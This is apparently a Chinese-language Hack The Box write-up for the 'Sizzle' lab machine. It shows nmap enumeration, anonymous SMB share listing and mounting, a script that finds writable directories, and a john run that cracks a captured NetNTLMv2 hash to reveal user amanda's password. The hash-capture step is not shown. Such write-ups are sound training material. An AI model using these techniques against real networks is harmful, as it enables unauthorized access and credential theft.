$ nmap -sC -sV 10.10.10.103 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-10 13:23 CST Nmap scan report for 10.10.10.103 Host is up (0.073s latency). Not shown: 987 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=sizzle.HTB.LOCAL | Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL | Not valid before: 2020-12-09T15:23:10 |_Not valid after: 2021-12-09T15:23:10 |_ssl-date: 2020-12-10T05:27:01+00:00; 0s from scanner time. 443/tcp open ssl/http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=sizzle.htb.local | Not valid before: 2018-07-03T17:58:55 |_Not valid after: 2020-07-02T17:58:55 |_ssl-date: 2020-12-10T05:27:00+00:00; 0s from scanner time. | tls-alpn: | h2 |_ http/1.1 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=sizzle.HTB.LOCAL | Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL | Not valid before: 2020-12-09T15:23:10 |_Not valid after: 2021-12-09T15:23:10 |_ssl-date: 2020-12-10T05:27:01+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=sizzle.HTB.LOCAL | Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL | Not valid before: 2020-12-09T15:23:10 |_Not valid after: 2021-12-09T15:23:10 |_ssl-date: 2020-12-10T05:27:01+00:00; 0s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=sizzle.HTB.LOCAL | Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL | Not valid before: 2020-12-09T15:23:10 |_Not valid after: 2021-12-09T15:23:10 |_ssl-date: 2020-12-10T05:27:01+00:00; 0s from scanner time. Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 190.49 seconds
21
FTP可以匿名登录,但没东西:
80
一张gif:
445
smb发现一些信息:
1 2 3 4 5 6 7 8 9 10 11 12 13
➜ ~ smbclient -N -L //10.10.10.103
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share CertEnroll Disk Active Directory Certificate Services share Department Shares Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share Operations Disk SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available
Department Shares
smb只有department可以访问,挂载方便查看内容:
1
mount -t cifs -o rw,username=guest,password= '//10.10.10.103/Department Shares' /mnt
ZZ_ARCHIVE
很多都是空目录,只有ZZ_ARCHIVE里有东西,自动化脚本检查:
Public
Public也是可写的,并且存在自动清理机制,写进去的文件会每4分钟被清除一次
writeable.sh
1 2 3 4 5 6 7 8 9 10
#!/bin/bash list=$(find /mnt -type d) for d in$list do touch $d/x 2>/dev/null if [ $? -eq 0 ] then echo$d" is writable" fi done
➜ Sizzle sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Ashare1972 (amanda) 1g 0:00:00:59 DONE (2020-12-03 02:50) 0.01694g/s 193435p/s 193435c/s 193435C/s Ashiah08..Arsenic Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed